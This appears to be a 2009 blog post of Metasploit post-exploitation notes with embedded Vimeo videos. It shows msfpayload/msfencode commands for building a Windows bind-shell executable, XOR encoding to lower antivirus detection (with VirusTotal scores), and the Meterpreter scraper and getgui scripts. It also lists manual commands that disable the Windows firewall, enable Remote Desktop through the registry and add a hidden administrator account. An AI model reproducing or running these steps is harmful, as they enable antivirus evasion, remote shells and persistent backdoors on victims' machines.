Metasploit keylogging

smartkeylog from ne0matrix on Vimeo.

Msfencode + Xor encoding ==> 15%

Fichier encodedbindtcpx.exe reçu le 2009.05.16 23:23:28 (CET)Situation actuelle: terminé
Résultat: 6/40 (15.00%)

http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482

xor4 from ne0matrix on Vimeo.

msfencode vs XOR encryption

./msfpayload windows/shell_bind_tcp LPORT=55555 X > ***.exe

Fichier bindtcpx.exe reçu le 2009.05.15 20:33:46 (CET)
Situation actuelle: terminé
Résultat: 12/40 (30.00%)
http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49

--------------------------
Execution flow hijack ==> XOR encryption

Fichier bindtcpx1.exe reçu le 2009.05.15 20:35:25 (CET)
Situation actuelle: terminé
Résultat: 8/40 (20.00%)
http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231

--------------------------
./msfpayload windows/shell_bind_tcp LPORT=55555 R msfencode -b '' -t exe -o ***.exe

Fichier encodedbindtcp.exe reçu le 2009.05.16 23:33:49 (CET)Situation actuelle: terminé
Résultat: 10/40 (25.00%)
http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e

Meterpreter Autoscript scraper.rb

scraper from ne0matrix on Vimeo.

scraper.rb on metasploit [dot] com

http://trac.metasploit.com/wiki/AutomatingMeterpreter

Remote desktop configuration

getgui from ne0matrix on Vimeo.

Getgui script:

getgui.rb on metasploit
run getgui -h

manual config:

Netstat –na find “3389”
Netsh firewall show opmode
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode exception=ENABLE
netsh firewall set service type = remotedesktop mode = enable
netsh firewall set service type = remotedesktop mode = enable scope=CUSTOM 192.168.1.64

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" find "fDenyTSConnections"

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

net user morpheus thematrix /add
net localgroup "Utilisateurs de Bureau à distance" /add"
net localgroup Administrateurs morpheus /add